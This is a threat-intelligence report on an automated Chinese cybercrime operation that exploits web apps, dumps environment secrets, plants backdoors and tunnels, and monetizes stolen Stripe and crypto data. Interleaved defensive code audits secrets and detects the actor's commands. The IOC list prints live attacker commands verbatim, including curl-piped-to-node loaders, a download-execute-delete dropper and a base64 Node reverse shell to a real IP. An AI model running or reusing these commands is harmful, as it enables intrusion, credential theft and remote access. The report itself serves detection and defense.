SOCRadar® Cyber Intelligence Inc. | Chinese Cybercrime Infrastructure Detected: Automated Exploitation & Harvesting Infrastructure
Apr 30, 2026
7 Mins Read
May 12, 2026
Moon

Chinese Cybercrime Infrastructure Detected: Automated Exploitation & Harvesting Infrastructure

The SOCRadar Threat Research Team identified automated Chinese cybercrime infrastructure that blends large-scale exploitation with structured orchestration and monetization. The operation is coordinated through a centralized backend (referred to as ‘paperclip’) and an agent-based workflow system, OpenClaw, which lets operators manage campaigns as structured missions.

The system targets vulnerable web applications using:

It performs internet-scale reconnaissance, exploits vulnerable targets, executes commands to extract sensitive data, and directly validates stolen credentials for financial gain.

Targeting Strategy

The actor uses FOFA and 360Quake for reconnaissance. FOFA is used to identify high-value organizations such as Web3 platforms, fintech services, and security vendors, while 360Quake focuses on technical fingerprinting of vulnerable services.

FOFA and 360Quake are both powerful cyberspace mapping engines, frequently used by security researchers, penetration testers and threat intelligence analysts, and evidently by threat actors as well, to identify and analyze internet-connected assets.

A notable pattern includes mass-generated FOFA accounts (e.g., fofa<random>@deltajohnsons[.]com), suggesting automated account creation to bypass API limits and sustain continuous scanning.

136 FOFA accounts are used to bypass API limits and maintain continuous scanning.

Exploitation and Execution

Custom Python scripts automate exploitation by executing commands such as environment variable dumps. These scripts support WAF bypass and parallel execution, enabling scalable exploitation across hundreds of targets. The primary objective is reliable remote code execution rather than simple vulnerability detection.

Custom Scripts:

  • 2.py, 3.py, 4.py, 11.py

Custom Python scripts for automated exploitation

Commands in .bash_history

Credential Harvesting

Following successful exploitation, the attacker extracts runtime secrets using environment variable dumps. These include AI API keys, Stripe keys, database credentials, and tokens. The secrets are parsed and stored centrally, indicating a focus on immediately usable data rather than raw dumps.
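An added defender-side example (not SOCRadar's tooling or the actor's code): it audits a process environment for the kinds of values the report says an `env` dump hands over, so a team can see what a single successful command would leak before moving those values into a secrets manager. The name hints, value prefixes and DSN schemes are assumed heuristics, and the sample environment is constructed.

```python
import re
from typing import Dict, List, Mapping
from urllib.parse import urlsplit

# Assumed heuristics: variable names that usually hold secrets.
NAME_HINTS = re.compile(r"(API_?KEY|SECRET|TOKEN|PASSW(OR)?D|PRIVATE_KEY|DATABASE_URL|DSN)", re.I)
# Assumed well-known value prefixes (Stripe live keys, "sk-" style AI API keys).
VALUE_PREFIXES = {"sk_live_": "stripe_secret", "rk_live_": "stripe_restricted", "sk-": "ai_api_key"}
# Connection-string schemes whose URL form embeds a password.
DSN_SCHEMES = {"postgres", "postgresql", "mysql", "redis", "mongodb", "amqp"}


def classify(name: str, value: str) -> List[str]:
    """Reasons this variable would be worth stealing; an empty list means it looks benign."""
    reasons = []
    if NAME_HINTS.search(name):
        reasons.append("name")
    for prefix, kind in VALUE_PREFIXES.items():
        if value.startswith(prefix):
            reasons.append(kind)
    parts = urlsplit(value)
    if parts.scheme in DSN_SCHEMES and parts.password:
        reasons.append("dsn_with_password")
    return reasons


def redact(value: str) -> str:
    """Keep just enough of a value to recognise it in a report, never the whole secret."""
    if len(value) <= 8:
        return "*" * len(value)
    return value[:4] + "..." + value[-2:]


def audit_env(env: Mapping[str, str]) -> List[Dict[str, str]]:
    """Return one finding per variable an `env` dump would expose, with a redacted preview."""
    findings = []
    for name, value in sorted(env.items()):
        reasons = classify(name, value)
        if reasons:
            findings.append({"name": name, "reasons": ",".join(reasons), "preview": redact(value)})
    return findings


# Constructed sample environment; every value is a placeholder.
SAMPLE_ENV = {
    "PATH": "/usr/bin:/bin",
    "NODE_ENV": "production",
    "STRIPE_SECRET_KEY": "sk_live_EXAMPLE0000000000",
    "OPENAI_API_KEY": "sk-EXAMPLE00000000000000",
    "DATABASE_URL": "postgres://app:s3cret@db.internal:5432/prod",
    "SESSION_SECRET": "a9f8e7d6c5b4a3f2e1d0",
}
```

Passing `os.environ` instead of `SAMPLE_ENV` from inside the application process shows exactly what the report's `env` command would have collected on that host.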

AI keys stored in the PostgreSQL database

Harvested keys on the server

Persistence and Access

The attacker deploys multiple persistence mechanisms, including Cloudflare tunnels, P2P clients, and backdoors (d2 and pl). This ensures stealthy and redundant access, avoiding reliance on a single communication channel.

Cloudflare tunnel: 

  • cf-client --name sshd wss://*.trycloudflare.com/ws

P2P client:

  • p2p-client client --name mayun

Backdoors:

  • d2
  • pl

.bash_history

Advanced Fileless Loader (NKN-based C2 Deployment):

The attacker utilizes a fileless execution chain to deploy a stealthy command-and-control agent:

  • python3 2.py -w -c "curl https://soft-silence-*.workers.dev/ | node"
  • python3 2.py -w -c "echo <base64_payload> | node"
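An added detection example (not SOCRadar's tooling or the actor's code) that flags the persistence and fileless-loader tradecraft above in shell history or auditd command lines: remote script piped into node, inline base64 decoded into node, the Cloudflare tunnel and P2P clients, NKN seed contact, and the download-chmod-run-delete chain. The regexes and the sample history are constructed; hostnames in the sample are placeholders.

```python
import re
from typing import Dict, List

# Constructed patterns modelled on the commands quoted in this report (assumed, not the actor's code).
PATTERNS: Dict[str, re.Pattern] = {
    # remote script piped straight into node (fileless loader)
    "curl_or_wget_piped_to_node": re.compile(r"\b(curl|wget)\b[^|]*\|\s*node\b"),
    # inline base64 blob decoded and executed by node without touching disk
    "base64_decoded_to_node": re.compile(
        r"\becho\s+[A-Za-z0-9+/=]{40,}\s*\|\s*(base64\s+-d\s*\|\s*)?node\b"),
    # Cloudflare quick tunnel carrying SSH
    "cloudflare_tunnel_client": re.compile(r"\bcf-client\b.*wss://[\w.-]+\.trycloudflare\.com"),
    # P2P client persistence
    "p2p_client": re.compile(r"\bp2p-client\s+client\b"),
    # NKN mainnet seed nodes used as the C2 transport
    "nkn_seed_contact": re.compile(r"mainnet-seed-\d{4}\.nkn\.org:30003"),
    # download to /tmp, chmod, run under a disguised --name, delete the binary
    "drop_exec_delete": re.compile(
        r"(curl|wget)\b.*-O\s+(/tmp/\S+).*chmod\s+\+x\s+\2.*\2\s+--name\s+\S+.*rm\s+\2"),
}


def normalize(line: str) -> str:
    """Undo web rendering (en dash for '--', curly quotes) so pasted and raw shell text both match."""
    return line.replace("\u2013", "--").replace("\u201c", '"').replace("\u201d", '"')


def scan_line(line: str) -> List[str]:
    """Names of every indicator matched by one shell history / auditd command line."""
    norm = normalize(line)
    return [name for name, rx in PATTERNS.items() if rx.search(norm)]


def scan_history(lines: List[str]) -> List[Dict[str, object]]:
    """Return one record per suspicious line: its number, matched indicators and text."""
    hits = []
    for n, line in enumerate(lines, 1):
        names = scan_line(line)
        if names:
            hits.append({"line_no": n, "indicators": names, "command": line.strip()})
    return hits


# Constructed sample .bash_history; hosts are placeholders, not real indicators.
SAMPLE_HISTORY = [
    "cf-client --name sshd wss://example-words.trycloudflare.com/ws",
    "p2p-client client --name mayun",
    'python3 2.py -w -c "curl https://soft-silence-EXAMPLE.workers.dev/ | node"',
    'python3 2.py -w -c "echo ' + "QUJD" * 15 + ' | base64 -d | node"',
    "wget https://cdn.example/hybrid -O /tmp/l64 && chmod +x /tmp/l64 && /tmp/l64 --name dbus && rm /tmp/l64",
    "curl -s http://mainnet-seed-0012.nkn.org:30003",
    "apt-get update",
]
```

The same patterns apply unchanged to process-creation telemetry (auditd `execve`, EDR command lines), where they catch the loader at execution time rather than after the fact.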

Malicious payload (agent) delivery pipeline

Orchestration Layer

The infrastructure is coordinated via a backend system (‘paperclip’) and a workflow-driven interface, OpenClaw. The observed pipeline includes stages such as planning, dispatching, reconnaissance, validation, and reporting, demonstrating human-in-the-loop control over automated processes.

Observed UI shows:

  • Plan → Review → Dispatch → Recon → Scan → Validate → Report

This confirms the operation is workflow-driven and operator-controlled.

Agent Dashboard on the server

Monetization

Stolen data is enriched and monetized using blockchain intelligence APIs and Stripe validation. Cryptocurrency addresses are analyzed across multiple chains, while stolen Stripe keys are tested via API calls to identify accounts with available balances. This enables immediate prioritization of high-value targets.

Crypto tracking:

  • OKLink / OKX / Tatum APIs
  • multi-chain wallet monitoring
  • ~100K tracked addresses

oklink_unified_deploy.py

.bash_history

Stripe validation:

.bash_history

Wallet Manager Dashboard

Scale

Data retrieved from the backend provides a clear view into the scale and maturity of the operation:

  • payload_exec_log: ~45,000 exploitation attempts
  • react2shell_vulns.txt: 346 vulnerable hosts
  • d2_good: 3981 hosts with d2 backdoor
  • pl_good: 1393 hosts with pl backdoor
  • webshell_implant_log: 900 webshell implants
  • Crypto Addresses: 21,999

Notably, the high number of backdoor deployments compared to confirmed webshells suggests a preference for lightweight, script-based persistence mechanisms (d2/pl) over traditional webshell usage.

Execution telemetry is centrally logged through dedicated tables such as:

  • payload_exec_log → tracks payload execution attempts
  • direct_payload_log → records successful exploitation and delivery
  • clip_exec_log → monitors command execution outcomes and validation status

Infrastructure Database

Conclusion

This infrastructure represents a shift in cybercrime operations toward structured, automated systems that integrate exploitation, data extraction, and monetization into a unified workflow. The combination of automation and human oversight allows attackers to scale operations while maintaining precision in targeting valuable assets. As attackers continue to adopt such models, defensive strategies must evolve to detect not only exploitation attempts but also post-exploitation behaviors and monetization activities.

How SOCRadar Can Help

The threat infrastructure described in this report was uncovered through SOCRadar’s Threat Research capabilities, combining Deep and Dark Web monitoring, exposed credential detection, and adversarial infrastructure tracking into a unified intelligence workflow.

SOCRadar users benefit from:

  • Dark & Deep Web Monitoring — Early detection of harvested credentials and API keys before they are monetized
  • Attack Surface Management — Continuous visibility into your internet-facing assets that actors like this actively scan via FOFA and 360Quake
  • Supply Chain Intelligence — Identification of compromised third-party services and tokens circulating in criminal backends
  • Threat Actor Tracking — Persistent monitoring of infrastructure patterns, C2 domains, and campaign tooling linked to known threat groups

If your organization operates in Web3, fintech, or cloud-native environments, you are a high-priority target for this class of threat actor.


Indicators of Compromise (IOCs)

Infrastructure IP Address
  • 124[.]220[.]164[.]14
Domains
  • kf[.]unpkg[.]top
  • anson-aeromarine-ocularly[.]ngrok-free[.]dev (Tor Proxy)
  • soft-silence-d978[.]13544681192[.]workers[.]dev
URLs
  • https[://]d6[.]tfdl[.]net/public/2026-04-07/a946d7de-2525-4189-bf4f-c3f4eec7a8ff/client.mjs
  • https[://]d6[.]tfdl[.]net/public/2026-04-07/5777281b-9243-4169-8faa-af60d7904c01/cf-client
  • https[://]d6[.]tfdl[.]net/public/2026-04-07/3d0d43d6-3b6d-44e6-bbff-2404f83a66b6/hybrid
  • http[://]mainnet-seed-0004[.]nkn[.]org:30003
  • http[://]mainnet-seed-0012[.]nkn[.]org:30003
  • http[://]mainnet-seed-0020[.]nkn[.]org:30003
Emails
  • 13544681192[@]163[.]com
  • d1rpt1xf[@]wegame[.]com
  • fofa*[@]deltajohnsons[.]com
Exploits
  • 2.py, 3.py, 4.py, 11.py
  • JNDIExploit-1.2-SNAPSHOT.jar
Commands
  • python3 2.py -w -u TARGET -c "env"
  • python3 2.py -u TARGET -w -c "curl https[://]soft-silence-d978[.]13544681192[.]workers[.]dev/ | node"
  • python3 2.py -w -c "wget https[://]d6[.]tfdl[.]net/public/2026-04-07/3d0d43d6-3b6d-44e6-bbff-2404f83a66b6/hybrid -O /tmp/l64 && chmod +x /tmp/l64 && /tmp/l64 --name dbus && rm /tmp/l64" -u
  • python3 2.py -w -c "curl http[://]124[.]220[.]164[.]14:33306" -u
  • python3 3.py -w -c "env" -f 1.txt -o my_vulns.txt
  • python3 3.py -w -c "env" -u TARGET
  • python3 3.py -w -c "echo KGZ1bmN0aW9uKCl7dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpLGNwID0gcmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLHNoID0gY3Auc3Bhd24oIi9iaW4vc2giLCBbXSk7dmFyIGNsaWVudCA9IG5ldyBuZXQuU29ja2V0KCk7Y2xpZW50LmNvbm5lY3QoMzMzMDYsICIxMjQuMjIwLjE2NC4xNCIsIGZ1bmN0aW9uKCl7Y2xpZW50LnBpcGUoc2guc3RkaW4pO3NoLnN0ZG91dC5waXBlKGNsaWVudCk7c2guc3RkZXJyLnBpcGUoY2xpZW50KTt9KTtyZXR1cm4gL2EvO30pKCk7 | base64 -d | node"